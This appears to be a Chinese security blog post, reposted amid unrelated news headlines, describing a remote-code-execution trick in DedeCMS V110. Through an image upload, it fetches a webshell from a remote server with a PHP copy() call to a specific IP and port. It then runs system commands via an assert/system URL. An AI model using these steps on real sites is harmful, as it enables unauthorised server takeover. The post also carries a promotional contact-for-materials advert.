Dedecms V110最新版RCE---Tricks
前言
刚发现Dedecms更新了发布版本,顺便测试一下之前的day有没有修复,突然想到了新的tricks去实现RCE。
文章发布的时候估计比较晚了,一直没时间写了。
利用
/uploads/dede/article_string_mix.php/uploads/dede/article_template_rand.php/uploads/dede/sys_task.php......
我发布的文档->>>>添加文档->>>>站内选择进行文件上传
(资料图片仅供参考)
/uploads/dede/content_list.php](http://dedecms.xyz:8066/uploads/dede/content_list.php?mid=1)/uploads/dede/catalog_do.php?channelid=0&cid=0&dopost=addArchives
文件上传
在vps上起一个http的服务,端口设置为8016
远程服务器存放shell.php,文件内容为
准备一个图片格式的文件,文件内容为,这里我上传的文件名称为f.png
copy("http://192.168.225.40:8016/shell.php","shell.php");?>
上传成功后可以看到上传的图片的位置
修改文件名为b.php
保存发现png图片已成功被更改,访问b.php,从远程vps下载了shell.php,当前目录下存在一个名称为shell.php的木马文件
利用webshell进行命令执行。
成功执行了命令
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图 ② 60+网安经典常用工具包 ③ 100+SRC漏洞分析报告 ④ 150+网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南+题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集(含答案) ⑧ APP客户端安全检测指南(安卓+IOS)
思考
如果不考虑文件上传后缀名绕过方法,仅以上面图片格式的文件上传的话,那么无所谓上传的什么内容,因为本身来讲dede的代码中对文件内容是做的有校验的
所以文件内有两种绕过方法
正则绕过
disable函数绕过
简单搜索了一下各个平台的文章,其实是有师傅正则绕过实现webshell的。第二点儿,disable函数绕过,往前几个版本,有兴趣的可以看一下源码,之前利用全局变量Globals
绕过
代码内容
命令执行
http://dedecms.org:8016/uploads/shell.php?test1=assert&&test2=system(%22ipconfig%22);
成功执行命令,且该命令执行为未授权命令执行。
所以在官方前几个版本中已经更新了,添加进了禁用方法
所以在绕过禁用方法上来讲更容易一点儿。所以在利用上这里利用了copy
函数的特性,那么这里提醒一下,其它的函数当然也可以满足效果。
更多网安技能的在线实操练习,请点击这里>>
关键词:
您可能也感兴趣:
为您推荐
开源证券:二手房成交面积环比上升,地方楼市宽松政策持续出台
博主缅甸街头拍摄时被人尾随跟踪 一听是中国人被跟踪!
公告“踩雷”中融信托,金博股份、南都物业股价双双跌超6%
排行
最近更新
- Dedecms V110最新版RCE---Tricks
- 华发股份最新公告:获得静安区天目社区C070102单元04-05、05-...
- 潞安环能(601699.SH):7月原煤产量475万吨 同比增长1.50%
- 作家莫言账号被封?B站辟谣!
- 青椒西红柿肉炒面的做法?
- 研报掘金丨浙商证券:百亚股份Q2收入端延续靓丽增长,维持“...
- 重庆市璧山区市场监管局三举措全力维护粮食市场秩序
- 如果举报qq会怎样(举报了QQ上的人 如果成功了 那人有什么结果)
- 赵明:荣耀在独立后的新征程上已经走过了1000天
- 火车票为何全程有票而中途站无票?铁路部门回应来了
- qq音乐相册怎么弄_qq音乐相册怎么做
- 衣服怎么叠才能节省空间_衣服怎么叠 节省空间
- A股共309只个股股价跌破每股净资产
- 塞力医疗(603716)8月14日主力资金净卖出1.18亿元
- 曼联后场得球加纳乔起速反击,勒米纳将其铲翻领到黄牌
- 金石资源: 金石资源集团股份有限公司独立董事关于2023年9月-...
- 新华社权威快报|我国全面推进县域商业三年行动
- 上证综指8月14日跌0.34%
- 储能中标丨国家电投南京滨江工业区零碳电厂储能系统开标
- 啤酒的口感最接近什么气味
- 产妇坐月子喝鲫鱼汤下奶吗,应该要怎么做呢?
- 暴雨过后,保险能为五常米农弥补损失吗?
- 不可错过!“算力赋能工业经济分论坛”开放报名
- 武汉光谷造“发电机组”,为湖北算力与大数据产业“水电站”...
- 飞科电器(603868):8月14日北向资金增持1.01万股
- “藏青蓝”绘夏夜“平安图”!武汉青山警方雷霆出击再添战果
- 华民股份(300345):8月14日北向资金增持31.31万股
- 水利部针对西北4省区启动干旱防御Ⅳ级应急响应
- 出品人是干什么的 出品人
- 电脑显示屏十大排名 华硕显示器怎么样